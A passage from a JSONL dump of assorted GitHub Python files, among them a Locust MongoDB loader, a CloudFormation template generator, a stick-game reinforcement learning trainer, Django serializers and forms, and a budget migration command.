pass the self reference for all helper functions\n ################################################################\n def get_time(self):\n return time.time()\n\n ################################################################\n # Audit should only be intended for logging errors\n # Otherwise, it impacts the load on your cluster since it's\n # extra work that needs to be performed on your cluster \n ################################################################\n def audit_err(self, type, msg):\n print(\"Audit: \", msg)\n self.audit.insert_one({\"type\":type, \"ts\":self.get_time(), \"msg\":str(msg)})\n\n ################################################################\n # Since the loader is designed to be single threaded with 1 user\n # There's no need to set a weight to the task.\n # Do not create additional tasks in conjunction with the loader\n # If you are testing running queries while the loader is running\n # deploy 2 clusters in mLocust with one running faker and the\n # other running query tasks\n # The reason why we don't want to do both loads and queries is\n # because of the simultaneous users and wait time between\n # requests. The bulk inserts can take longer than 1s possibly\n # which will cause the workers to fall behind.\n ################################################################\n # TODO 0 this out if doing normal load\n @task(1)\n def _bulkinsert(self):\n # Note that you don't pass in self despite the signature above\n tic = self.get_time();\n name = \"bulkinsert\";\n \n try:\n # self.coll.insert_many([self.gen.create() for _ in range(self.bulk_size)], ordered=False)\n self.coll.insert_many(schema*self.bulk_size, ordered=False)\n\n events.request_success.fire(request_type=\"pymongo\", name=name, response_time=(self.get_time()-tic)*1000, response_length=0)\n except Exception as e:\n events.request_failure.fire(request_type=\"pymongo\", name=name, response_time=(self.get_time()-tic)*1000, response_length=0, exception=e)\n self.audit_err(\"exception\", e)\n # Add a sleep for just faker gen so we don't hammer the system with file not found ex\n time.sleep(5)\n","repo_name":"10gen/mlocust-app","sub_path":"docker-image/locust-tasks/locustfile-mimesis.py","file_name":"locustfile-mimesis.py","file_ext":"py","file_size_in_byte":11839,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"3"}
+{"seq_id":"10900851732","text":"import click\nimport requests\nfrom cfn_flip import to_yaml\nimport json\nimport os\nimport logging\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\nlogging.basicConfig(\n format=\"%(levelname)s %(threadName)s [%(filename)s:%(lineno)d] %(message)s\",\n datefmt=\"%Y-%m-%d:%H:%M:%S\",\n level=logging.INFO,\n)\n\n\n@click.group()\ndef cli():\n \"\"\"cli\"\"\"\n pass\n\n\ndef generate(type, specification, include_optional, property_types, friendly_name):\n logger.info(f\"Generating: {type}\")\n parameters = {}\n resource_properties = {}\n for property_name, property in specification.get('Properties', {}).items():\n logger.info(f\"looking at property: {property_name}\")\n is_optional = not property.get('Required')\n required = property.get('Required')\n if required or (is_optional and include_optional):\n if property.get('PrimitiveType') is not None:\n parameters[f\"{friendly_name}{property_name}\"] = {\n 'Type': property.get('PrimitiveType').replace('Integer', \"Number\").replace(\"Boolean\", \"String\"),\n 'Description': property.get('Documentation')\n }\n if property.get('PrimitiveType') == \"Boolean\":\n parameters[f\"{friendly_name}{property_name}\"]['AllowedValues'] = [\"true\", \"false\"]\n if not property.get('Required'):\n parameters[f\"{friendly_name}{property_name}\"]['Default'] = None\n resource_properties[property_name] = {\"Ref\": f\"{friendly_name}{property_name}\"}\n elif property.get('Type') == \"List\":\n pass\n elif property.get('Type') == \"Map\":\n pass\n else:\n property_type = f\"{type}.{property.get('Type')}\"\n spec = property_types.get(property_type)\n logger.info(f\"spec for {property_type} was {spec}\")\n p, r, o = generate(\n type,\n property_types.get(property_type),\n include_optional,\n property_types,\n f\"{friendly_name}{property.get('Type')}\"\n )\n resource_properties[property_name] = r\n parameters.update(p)\n\n outputs = {}\n for attribute in specification.get('Attributes', []):\n outputs[f\"{friendly_name}{attribute}\"] = {\n \"Value\": {\"GetAtt\": [\"Resource\", attribute]}\n }\n\n return parameters, resource_properties, outputs\n\n\n@cli.command()\n@click.argument('region')\n@click.argument('type')\n@click.option('--include-optional/--no-include-optional', default=False)\ndef make_me_a(region, type, include_optional):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n result = generate_a(content, type, include_optional)\n click.echo(result)\n\n\ndef generate_a(content, type, include_optional):\n property_types = content.get('PropertyTypes')\n resources = content.get('ResourceTypes')\n specification = resources.get(type)\n parameters, resource_properties, outputs = generate(type, specification, include_optional, property_types, \"\")\n result = dict(\n AWSTemplateFormatVersion=\"2010-09-09\",\n Description=specification.get('Documentation'),\n )\n if len(parameters.keys()) > 0:\n result['Parameters'] = parameters\n result['Resources'] = {\n \"Resource\": {\n \"Type\": type,\n \"Description\": specification.get('Documentation'),\n }\n }\n if len(resource_properties.items()) > 0:\n result['Resources'][\"Resource\"][\"Properties\"] = resource_properties\n if len(outputs.keys()) > 0:\n result['Outputs'] = outputs\n return to_yaml(json.dumps(result))\n\n\n@cli.command()\n@click.argument('region')\n@click.argument('output', type=click.Path(exists=True))\n@click.option('--include-optional/--no-include-optional', default=False)\ndef make_me_all(region, output, include_optional):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n version = content.get('ResourceSpecificationVersion')\n resource_types = content.get('ResourceTypes')\n for resource_type in resource_types.keys():\n result = generate_a(content, resource_type, include_optional)\n out = os.path.join(output, resource_type.replace(\"::\", \"-\"), version)\n if not os.path.exists(out):\n os.makedirs(out)\n with open(os.path.join(out, f\"product.template-{region}.yaml\"), 'w') as f:\n f.write(result)\n\n\n@cli.command()\n@click.argument('region')\ndef get_current_resource_specification_version(region):\n source = f\"https://cfn-resource-specifications-{region}-prod.s3.{region}.amazonaws.com/latest/gzip/CloudFormationResourceSpecification.json\"\n response = requests.get(source)\n content = response.json()\n click.echo(content.get('ResourceSpecificationVersion'))\n\n\nif __name__ == \"__main__\":\n cli()\n","repo_name":"eamonnfaherty/service-catalog-product-maker","sub_path":"servicecatalog_product_maker/product_maker.py","file_name":"product_maker.py","file_ext":"py","file_size_in_byte":5201,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"70257994962","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\nimport sys\n\n\nsys.path.append(\"..\")\nfrom tools.linear_regression.linear_regression import LinReg\n\n#linear regression with one independent variable \n\n#load dataset\ndir_path = os.path.dirname(os.path.realpath(__file__))\nsource = os.path.join(dir_path, 'data', 'weight-height.csv')\ndf = pd.read_csv(source)\n\n#restrict to one gender\nfemales = df[df['Gender'] == 'Female']\n\n#determine independent (x) and dependent (y) variable\nx = females['Weight'].tolist()\ny = females['Height'].tolist()\n\n#initialize regression class\nregress = LinReg(x,y, columns=['weight', 'height'])\n\n#describe dependent variable\nregress.y_stats(report=True, write='results/weight_height.txt')\n\n#fit data - use OLS\nregress.fit(method='ordinary')\nregress.analyse(se_samples=20, report=True, write='results/weight_height.txt', add_note=True)\nregress.evaluate()\n\n#visualize results\nplt.scatter(x,y)\nplt.title('Female Height and Weight (5000 samples) inkl. Best Fit')\nplt.ylabel('Height in inches')\nplt.xlabel('Weight in lbs')\nplt.plot(x, [regress.beta[0] + regress.beta[1]*xi for xi in x], color='red')\nplt.savefig('results/weight_height_graph.png') \nplt.show()\n\n#predict \nprediction = regress.predict(120)\nprint('Prediction: the person will weigh', prediction, 'lbs')\n\n\n\n\n\n\n","repo_name":"pdoms/project_i","sub_path":"src/examples/weight_height.py","file_name":"weight_height.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"27577826846","text":"import unittest\r\nimport master\r\nfrom master import Book\r\nfrom master import UserBorrowedBooks\r\nfrom master import LibraryUser\r\nfrom master import BookStatuses\r\nimport datetime\r\n\r\nclass testMaster(unittest.TestCase):\r\n \r\n def setUp(self):\r\n user = {\"_username\": \"thiennguyen\", \"_first_name\": \"Thien\", \"_last_name\": \"Nguyen\", \"_email\": \"thien.nguyen@gmail.com\"}\r\n master.create_user_if_not_exists(user)\r\n book = {\"_id\": 1, \"_title\": \"Book1\", \"_isbn\": \"11111111\", \"_author\": \"unknown\", \"_published_date\" : \"1/1/1999\"}\r\n borrowing_book = Book(id=book[\"_id\"], title=book[\"_title\"], isbn=book[\"_isbn\"], author=book[\"_author\"], published_date=book[\"_published_date\"])\r\n master.session.add(borrowing_book)\r\n master.session.commit()\r\n #master.main()\r\n\r\n \r\n def test_current_userer(self):\r\n user = master.session.query(LibraryUser).filter(LibraryUser.username == \"thiennguyen\").first()\r\n self.assertTrue(user[\"_username\"] is not None)\r\n self.assertTrue(user[\"_first_name\"] is not None)\r\n self.assertTrue(user[\"_last_name\"] is not None)\r\n self.assertTrue(user[\"_email\"] is not None)\r\n\r\n def test_borrow_book(self):\r\n borrowing_user = master.session.query(LibraryUser).filter(LibraryUser.username == \"thiennguyen\").first()\r\n borrowing_book = master.session.query(Book).filter(Book.id == 1).first()\r\n event = master.add_borrowed_event(borrowing_book, borrowing_user)\r\n borrow = UserBorrowedBooks(library_user_id=borrowing_user.id, book_id=int(borrowing_book.id),status=BookStatuses.borrowed, borrowed_date=datetime.today().date(),calendar_event_id=event.get(\"id\"))\r\n master.session.add(borrow)\r\n master.session.commit()\r\n self.assertTrue(master.session.query(UserBorrowedBooks).filter(UserBorrowedBooks.book_id == 1).first is not None)\r\n \r\n def test_return_book(self):\r\n returning_book = master.session.query(Book).filter(Book.id == 1).first()\r\n returning_book.status = BookStatuses.returned\r\n master.session.commit()\r\n test_book = master.session.query(Book).filter(Book.id == 1).first()\r\n self.assertTrue(test_book.status == BookStatuses.returned)","repo_name":"s3714217/IOT-OnlineLibrary","sub_path":"master/master_test.py","file_name":"master_test.py","file_ext":"py","file_size_in_byte":2347,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18767463523","text":"#Training 用のデータセットの作成\n#保存形式はnpy 形式で保存するつもり\n#データ配列の形状は[num_images, 1, 41, 41]になるはず?\nimport numpy as np\nimport cv2\nimport os\nimport sys\nfrom joblib import Parallel, delayed\n\n#parameter\nSIZE_INPUT = 41\nSIZE_LABEL = 41\nSCALE = 3\nSTRIDE = 11\n\n#path 情報\nimage_path = '../images/91_images_aug/'\n#image_path = '../images/general_100_aug/'\nimage_paths = os.listdir(image_path)\n\n#初期化\ntrain = None\nlabel = None\npadding = np.abs(SIZE_INPUT - SIZE_LABEL) / 2\n\n#ループ情報\nlength = len(image_paths)\nim_no = 0\n#データ生成\n#並列化 関数\ndef gen_train(i):\n c = 0\n #chainer ではfloat32を読み込むがmatlab版では倍精度に変換している\n image = cv2.imread(image_path+i)\n image = (cv2.cvtColor(image, cv2.COLOR_BGR2YCR_CB)[:, :, 0]).astype(np.float64)\n #画像サイズの調整\n size = np.array(image.shape)\n size = size - size % SCALE\n #ラベル用画像\n image_label = image[0:size[0], 0:size[1]]\n height, width = image_label.shape\n #中間縮小画像\n buf = cv2.resize(image_label, (width//SCALE, height//SCALE), \\\n interpolation=cv2.INTER_CUBIC)\n #入力用画像\n image_input = cv2.resize(buf, (width, height), \\\n interpolation=cv2.INTER_CUBIC)\n #各画像を入力サイズに切り分けていく\n for x in range(0, height - SIZE_INPUT + 1, STRIDE):\n for y in range(0, width - SIZE_INPUT + 1, STRIDE):\n subim_input = image_input[np.newaxis, np.newaxis, x:x+SIZE_INPUT, y:y+SIZE_INPUT]/255\n subim_label = image_label[np.newaxis, np.newaxis, x:x+SIZE_INPUT, y:y+SIZE_INPUT]/255\n\n #雑魚セクション\n _data = np.concatenate([subim_input, subim_label], axis=0)\n np.save('../images/Yang91_npy_float64/' + str(i.split('.')[0]) + '_' + str(c) + '.npy', _data)\n c += 1\n#並列処理\nParallel(n_jobs=-1, verbose=5)([delayed(gen_train)(i) for i in image_paths])\nprint(\"saved data to npy\")\n","repo_name":"shimo8810/DRLSR","sub_path":"src/generate_train.py","file_name":"generate_train.py","file_ext":"py","file_size_in_byte":2061,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"23516951731","text":"from rest_framework import serializers, status\nfrom v1.commonapp.serializers.tenant import TenantMasterViewSerializer\nfrom v1.commonapp.serializers.utility import UtilityMasterViewSerializer\nfrom v1.store.models.store_type import StoreType as StoreTypeTbl\nfrom django.db import transaction\nfrom datetime import datetime\nfrom v1.commonapp.views.custom_exception import CustomAPIException\nfrom api.messages import NAME_ALREADY_EXIST\nfrom v1.store.views.common_functions import set_store_type_vaidated_data\n\nclass StoreTypeListSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = StoreTypeTbl\n fields = ('id_string', 'name','is_active','created_by','created_date')\n\n\nclass StoreTypeViewSerializer(serializers.ModelSerializer):\n tenant = serializers.ReadOnlyField(source='tenant.name')\n tenant_id_string = serializers.ReadOnlyField(source='tenant.id_string')\n utility = serializers.ReadOnlyField(source='utility.name')\n utility_id_string = serializers.ReadOnlyField(source='utility.id_string')\n\n class Meta:\n model = StoreTypeTbl\n fields = ('id_string', 'name', 'tenant','tenant_id_string','utility','utility_id_string')\n\nclass StoreTypeSerializer(serializers.ModelSerializer):\n name = serializers.CharField(required=True, max_length=200)\n utility_id = serializers.CharField(required=True, max_length=200)\n tenant_id = serializers.CharField(required=True, max_length=200)\n\n class Meta:\n model = StoreTypeTbl\n fields = ('__all__')\n\n def create(self, validated_data, user):\n with transaction.atomic():\n validated_data = set_store_type_vaidated_data(validated_data)\n if StoreTypeTbl.objects.filter(name=validated_data['name'],tenant_id=validated_data['tenant_id'],\n utility_id=validated_data['utility_id']).exists():\n raise CustomAPIException(NAME_ALREADY_EXIST, status_code=status.HTTP_409_CONFLICT)\n else:\n store_type_obj = super(StoreTypeSerializer, self).create(validated_data)\n store_type_obj.created_by = user.id\n store_type_obj.updated_by = user.id\n store_type_obj.save()\n return store_type_obj\n\n def update(self, instance, validated_data, user):\n validated_data = set_store_type_vaidated_data(validated_data)\n if StoreTypeTbl.objects.filter(name=validated_data['name'],tenant_id=validated_data['tenant_id'],\n utility_id=validated_data['utility_id']).exists():\n raise CustomAPIException(NAME_ALREADY_EXIST, status_code=status.HTTP_409_CONFLICT)\n else:\n with transaction.atomic():\n store_type_obj = super(StoreTypeSerializer, self).update(instance, validated_data)\n store_type_obj.updated_by = user.id\n store_type_obj.updated_date = datetime.utcnow()\n store_type_obj.save()\n return store_type_obj","repo_name":"bynryTechnologies/Neovibe-API","sub_path":"api/v1/store/serializers/store_type.py","file_name":"store_type.py","file_ext":"py","file_size_in_byte":3031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"72806521040","text":"#!/usr/bin/env python3\n\nfrom typing import List\n\nclass Solution:\n def longestConsecutive(self, nums: List[int]) -> int:\n max_count = 0\n\n s = set()\n for x in nums:\n s.add(x)\n\n for num in nums:\n if (num - 1) not in s:\n count = 0\n while (num + count) in s:\n count += 1\n max_count = max(max_count, count)\n\n return max_count\n","repo_name":"abhaysp95/cp_prac","sub_path":"neetcode/array_hashing/longest_consecutive_sequence.py","file_name":"longest_consecutive_sequence.py","file_ext":"py","file_size_in_byte":444,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"17567255551","text":"from collections import defaultdict, Counter\nimport urllib.request\nimport numpy as np\nimport matplotlib.pyplot as plt\n#import pickle\nimport dill as pickle\nfrom tqdm import tqdm\nimport time\nimport math\nfrom scipy.stats import expon\nimport random\nimport sys\n#from tqdm import tqdm_notebook as tqdm\n\n\nclass Player:\n\n def __init__(self, player_number):\n self.player_number = player_number\n\n def initial_state(self, n):\n\n self.stick_count = defaultdict(lambda: defaultdict(int))\n self.stick_prob = defaultdict(lambda: defaultdict(float))\n\n for i in range(1, n + 1): # iterating over no. of sticks\n for j in range(1, 4):\n self.stick_count[i][j] = 3\n self.stick_prob[i][j] = 1 / 3\n\n # updating policy for winning\n def update_policy_winner(self):\n\n for k in self.stick_no.keys():\n self.stick_count[k][self.stick_no[k]] += 1\n for i in range(1, 4):\n self.stick_prob[k][i] = self.stick_count[k][i] / sum(self.stick_count[k].values())\n\n # updating policy for losing\n def update_policy_loser(self):\n\n for k in self.stick_no.keys():\n if sum(self.stick_count[k].values()) > 1 and self.stick_count[k][self.stick_no[k]] > 0:\n self.stick_count[k][self.stick_no[k]] -= 1\n for i in range(1, 4):\n self.stick_prob[k][i] = self.stick_count[k][i] / sum(self.stick_count[k].values())\n\n def save_policy(self):\n with open('policy_%s.bin' % ('first' if self.player_number == 1 else 'second'), 'wb') as f:\n pickle.dump(self.stick_prob, f)\n pickle.dump(self.stick_count, f)\n\n def load_policy(self):\n with open('policy_%s.bin' % ('first' if self.player_number == 1 else 'second'), 'rb') as f:\n self.stick_prob = pickle.load(f)\n self.stick_count = pickle.load(f)\n\n\nclass State:\n\n def __init__(self, n, player1, player2, N, epsilon=0.8):\n\n self.n = n\n self.sticks = n\n self.player1 = player1\n self.player2 = player2\n self.epsilon = epsilon\n self.N = N\n\n def reset_state(self):\n self.sticks = self.n\n self.player1.stick_no = {}\n self.player2.stick_no = {}\n\n def update_state(self, player, sim):\n\n keys = list(player.stick_prob[self.sticks].keys())\n values = list(player.stick_prob[self.sticks].values())\n\n if expon.pdf(sim / self.N, loc=0, scale=1) > self.epsilon and np.random.uniform(0, 1) > 0.5:\n\n rand_index_1 = np.random.choice(len(keys))\n player.stick_no[self.sticks] = keys[rand_index_1]\n\n else:\n rand_index_1 = np.random.choice(len(keys), 1, p=values)\n player.stick_no[self.sticks] = keys[rand_index_1[0]]\n self.sticks = self.sticks - player.stick_no[self.sticks]\n\n # checking the winner\n def check_winner(self, winner):\n\n if winner == 1:\n self.player1.update_policy_winner()\n self.player2.update_policy_loser()\n else:\n self.player2.update_policy_winner()\n self.player1.update_policy_loser()\n\n\ndef train(N, n):\n \"\"\"\n Train the bot to play a stick game by making two AI players to compete\n\n Parameters\n ----------\n N : no. of simulations\n n : no. of sticks\n\n Returns\n -------\n\n Trained AI players\n\n player1 : object\n player2 : object\n\n\n Examples\n --------\n train(50000,50)\n\n \"\"\"\n\n player1 = Player(1)\n player2 = Player(2)\n\n state = State(n, player1, player2, N, 0.8)\n\n player1.initial_state(n)\n player2.initial_state(n)\n\n for sim in tqdm(range(N)):\n # print (sim)\n\n state.reset_state()\n\n while True:\n\n if state.sticks > 0:\n state.update_state(player1, sim)\n # print (state.sticks)\n else:\n winner = 1\n # print (\"Player 1 Wins\")\n break\n\n if state.sticks > 0:\n state.update_state(player2, sim)\n else:\n winner = 2\n # print (\"Player 2 Wins\")\n break\n\n state.check_winner(winner)\n\n player1.save_policy()\n player2.save_policy()\n\n time.sleep(0.01)\n\n\n\nif __name__ == '__main__':\n train(50000,50)\n\n","repo_name":"amank90/stick_game","sub_path":"src/train_stick_game.py","file_name":"train_stick_game.py","file_ext":"py","file_size_in_byte":4312,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14886065214","text":"import logging\n\nfrom django.core.management import call_command\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Q, Sum\n\nfrom budgetweb.apps.structure.models import PlanFinancement\nfrom budgetweb.models import Depense, PeriodeBudget, Recette\n\n\ncommands_logger = logging.getLogger('import_commands')\n\n\nclass Command(BaseCommand):\n help = 'Check if the StructureMontant objects are correct'\n\n def add_arguments(self, parser):\n parser.add_argument('year', nargs=1, metavar='YEAR', type=int)\n\n def create_depenses(self, pfi, *args, **kwargs):\n year = kwargs.pop('year', None)\n extra_values = kwargs.pop('extra_values', [])\n values = ['naturecomptabledepense', 'domainefonctionnel'] + extra_values\n depenses = pfi.depense_set\\\n .filter(*args, **kwargs)\\\n .values(*values)\\\n .annotate(Sum('montant_ae'), Sum('montant_cp'), Sum('montant_dc'))\n\n depenses_list = [\n Depense(\n pfi=pfi,\n periodebudget=self.period,\n annee=year or depense['annee'],\n naturecomptabledepense_id=depense['naturecomptabledepense'],\n domainefonctionnel_id=depense['domainefonctionnel'],\n montant_ae=depense['montant_ae__sum'],\n montant_cp=depense['montant_cp__sum'],\n montant_dc=depense['montant_dc__sum'],\n creepar='Command migrate_pluriannuel',\n ) for depense in depenses\n ]\n return depenses_list\n\n def create_recettes(self, pfi, *args, **kwargs):\n year = kwargs.pop('year', None)\n extra_values = kwargs.pop('extra_values', [])\n values = ['naturecomptablerecette'] + extra_values\n recettes = pfi.recette_set\\\n .filter(*args, **kwargs)\\\n .values(*values)\\\n .annotate(Sum('montant_ar'), Sum('montant_re'), Sum('montant_dc'))\n\n recettes_list = [\n Recette(\n pfi=pfi,\n periodebudget=self.period,\n annee=year or recette['annee'],\n naturecomptablerecette_id=recette['naturecomptablerecette'],\n montant_ar=recette['montant_ar__sum'],\n montant_re=recette['montant_re__sum'],\n montant_dc=recette['montant_dc__sum'],\n creepar='Command migrate_pluriannuel',\n ) for recette in recettes\n ]\n return recettes_list\n\n def handle(self, *args, **options):\n verbosity = options.get('verbosity')\n\n for year in options.get('year'):\n try:\n self.period = PeriodeBudget.objects.get(\n annee=year, period__code='BI')\n except PeriodeBudget.DoesNotExist:\n raise Exception('Erreur : Période BI %s inexistante' % year)\n\n if self.period.has_entries():\n raise Exception('Erreur : Entrées déjà existantes pour la '\n 'période BI %s ' % year)\n\n pfis = PlanFinancement.objects.filter(is_pluriannuel=True)\n depenses = []\n recettes = []\n for pfi in pfis:\n # Budget antérieur\n depenses.extend(self.create_depenses(\n pfi,\n (Q(annee=year - 2) | Q(annee=year - 1)),\n year=year - 1, periodebudget__annee=year - 1))\n recettes.extend(self.create_recettes(\n pfi,\n (Q(annee=year - 2) | Q(annee=year - 1)),\n year=year - 1, periodebudget__annee=year - 1))\n\n # Budgets futurs\n depenses.extend(self.create_depenses(\n pfi, extra_values=['annee'], annee__gte=year,\n periodebudget__annee=year - 1))\n recettes.extend(self.create_recettes(\n pfi, extra_values=['annee'], annee__gte=year,\n periodebudget__annee=year - 1))\n\n # bulk_create is faster but it does not trigger the save method.\n # Therefore, this script needs to launch check_structuremontants\n Depense.objects.bulk_create(depenses)\n Recette.objects.bulk_create(recettes)\n\n check_structuremontants_parameters = filter(\n bool, ('-v %s' % verbosity,))\n\n call_command('check_structuremontants', '-u', '-y %s' % year,\n *check_structuremontants_parameters, stdout=self.stdout)\n\n commands_logger.info('Command migrate_pluriannuel launched with parameters : %s' % options)\n","repo_name":"unistra/budgetweb","sub_path":"budgetweb/management/commands/migrate_pluriannuel.py","file_name":"migrate_pluriannuel.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"27069780083","text":"import os,sys\nimport subprocess\n\nclass TerminalTable:\n def __init__(self,conf):\n self.conf = conf\n self.mill_index = 0\n self.refresh_terminal_shape()\n self.col_names = [\"Run\",\"Type\",\"Status\",\"#Frames\",\"#Hits\",\"HRate\"]\n self.title = [\"# Cheetah queue status\",(\"-\"*self.shape[1]),\"\",(\"-\"*self.shape[1])]\n self.runs = {}\n self.set_message(\"Initializing...\")\n def set_message(self,message):\n self.message = [message]\n def note(self,message):\n self.message = [message]\n self.print_screen()\n def set_runs(self,runs):\n self.runs = runs\n self.print_screen()\n def _get_s_head(self):\n s_head = \"\"\n s_head += \"=\"*self.shape[0]+\"\\n\"\n s = \"CHEETAH RUNNER\"\n l = self.shape[0]-len(s)-4\n s_head += \"||\"+\" \"*(l/2)+s+\" \"*(l/2)+\"||\\n\"\n s_head += \"=\"*self.shape[0]+\"\\n\"\n width = self.shape[0]/56\n for w in range(width):\n for c in self.col_names:\n s_head += c + \"\\t\"\n s_head += \" || \"\n s_head = s_head[:-9] + \"\\n\"\n return s_head\n def _get_s_message(self):\n s_message = \"\"\n for m in self.message:\n s_message += m + \"\\n\"\n return s_message\n def _get_s_content(self):\n s_content = \"\"\n names = self.runs.keys()\n names.sort()\n length = self.shape[1]-8-self.Nlines_jobs-(self.Nlines_jobs>0)\n width = self.shape[0]/56\n #print length\n #print len(names)\n s_content_lines = [\"\"] * length\n for i in range(length*width):\n if i <= (len(names)-1):\n R = self.runs[names[-i-1]]\n s_content_lines[i%length] += names[-i-1] + \"\\t\"\n for c in self.col_names[1:]:\n s_content_lines[i%length] += R.attrs.get(c,\"-\") + \"\\t\"\n s_content_lines[i%length] += \" || \"\n else:\n s_content_lines[i%length] += (\"-\\t\"*len(self.col_names)) + \" || \"\n s_content = \"\"\n for i in range(length):\n s_content += s_content_lines[i][:-9] + \"\\n\"\n return s_content\n def _get_s_jobs(self):\n s_jobs = \"\"\n if os.path.expandvars(self.conf[\"general\"][\"job_manager\"]) == \"lsf\":\n c = [\"bjobs\"]\n elif os.path.expandvars(self.conf[\"general\"][\"job_manager\"]) == \"slurm\":\n c = [\"squeue\",os.path.expandvars(\"-u$USER\")]\n #print c\n p = subprocess.Popen(c,stdout=subprocess.PIPE)\n p.wait()\n lines = p.stdout.readlines()\n self.Nlines_jobs = len(lines)\n for l in lines:\n s_jobs += l\n return s_jobs\n def refresh_terminal_shape(self):\n rows, columns = os.popen('stty size', 'r').read().split()\n self.shape = (int(columns),int(rows))\n def clear_screen(self):\n sys.stdout.write(\"\\033[2J\") # clear screen and goes to position 0 \n sys.stdout.write(\"\\033[H\")\n sys.stdout.flush()\n def print_screen(self):\n self.refresh_terminal_shape()\n s_head = self._get_s_head()\n s_message = self._get_s_message()\n s_jobs = self._get_s_jobs()\n s_content = self._get_s_content()\n self.clear_screen()\n sys.stdout.write(s_head)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n sys.stdout.write(s_content)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n if self.Nlines_jobs > 0:\n sys.stdout.write(s_jobs)\n sys.stdout.write(\"-\"*self.shape[0]+\"\\n\")\n mill = [\"-\",\"\\\\\",\"|\",\"/\"][self.mill_index%4]\n self.mill_index += 1\n sys.stdout.write(mill + \" \" + s_message)\n sys.stdout.flush()\n \n\n","repo_name":"antonbarty/cheetah-2017","sub_path":"oldstuff/2015/examples/analysis-pipeline-max/terminal.py","file_name":"terminal.py","file_ext":"py","file_size_in_byte":3709,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"3"}
+{"seq_id":"144109321","text":"\"\"\"Django\"\"\"\nfrom django.contrib import admin\nfrom django.contrib.auth.admin import UserAdmin as BaseUserAdmin\n\"\"\"Models\"\"\"\nfrom users.models import Profile\nfrom django.contrib.auth.models import User\n\n\n\n\n# Register your models here.\n\n\n@admin.register(Profile) # registro la app en el admin\nclass ProfileAdmin(admin.ModelAdmin):\n list_display = ('pk', 'user', 'phone_number', 'website', 'picture')\n # nos lleva al detalle cuando apretamos sobre ellos\n list_display_links = ('pk', 'user',)\n # los hacemos editables, no deben estar en links\n list_editable = ('phone_number', 'website', 'picture')\n search_fields = ('user__username', 'user__email', 'user__first_name',\n 'user__last_name', 'phone_number') # campo de busqueda\n list_filter = ('user__is_active', 'user__is_staff',\n 'created', 'modified') # filtros\n\n fieldsets = ( # info mejor estructurada\n ('Profile', {\n 'fields': (('user', 'picture'),),\n }),\n ('Extra info', {\n 'fields': (\n ('website', 'phone_number'),\n ('biography')\n )\n }),\n ('Metadata', {\n 'fields': (('created', 'modified'),),\n })\n )\n\n readonly_fields = ('created', 'modified',) # campos que no puedo modificar, solo leer\n\n\nclass ProfileInline(admin.StackedInline):\n \"\"\"Profile in-line admin for users.\"\"\"\n\n model = Profile\n can_delete = False\n verbose_name_plural = 'profiles'\n\n\nclass UserAdmin(BaseUserAdmin):\n \"\"\"Add profile admin to base user admin.\"\"\"\n\n inlines = (ProfileInline,)\n list_display = (\n 'username',\n 'email',\n 'first_name',\n 'last_name',\n 'is_active',\n 'is_staff'\n )\n\n\nadmin.site.unregister(User)\nadmin.site.register(User, UserAdmin)\n","repo_name":"NahuelFrias/BloggramPython-Django","sub_path":"users/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"16674242716","text":"from django import forms\nfrom .models import Income,Expense\nfrom django.forms import ModelForm,NumberInput,Select,DateInput\n# import django.forms\nfrom .models import *\nimport datetime\n\n\nclass IncomeForm(ModelForm):\n class Meta:\n model = Income\n fields = [\"amount\",\"date\",\"category\"]\n choices = CATEGORY_INCOME\n widgets = {\"amount\":NumberInput(attrs={'class':\"form-control\",'placeholder':'Input amount'}),\n \"date\":DateInput(attrs={\"class\":\"form-control\",'placeholder':'Input date'}),\n \"choices\":Select(choices= choices, attrs={\"class\":\"form-control\",'placeholder':'Select category'})}\n\n\nclass ExpenceForm(ModelForm):\n class Meta:\n model = Expense\n fields = [\"amount\",\"date\",\"category\"]\n choices = CATEGORY_EXPENCE\n widgets = {\"amount\":NumberInput(attrs={'class':\"form-control\",'placeholder':'Input amount'}),\n \"date\":DateInput(attrs={\"class\":\"form-control\",'placeholder':'Input date'}),\n \"choices\":Select(choices= choices, attrs={\"class\":\"form-control\",'placeholder':'Select category'})}\n\n# ---------------------\nclass GetStatsForPeriod(forms.Form):\n start_date = forms.DateField(widget = forms.SelectDateWidget(years=range(1980,2100)))\n end_date = forms.DateField(widget = forms.SelectDateWidget(years=range(1980,2100)))\n","repo_name":"Ventriss40k/Finance-log-app-project","sub_path":"f_app/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
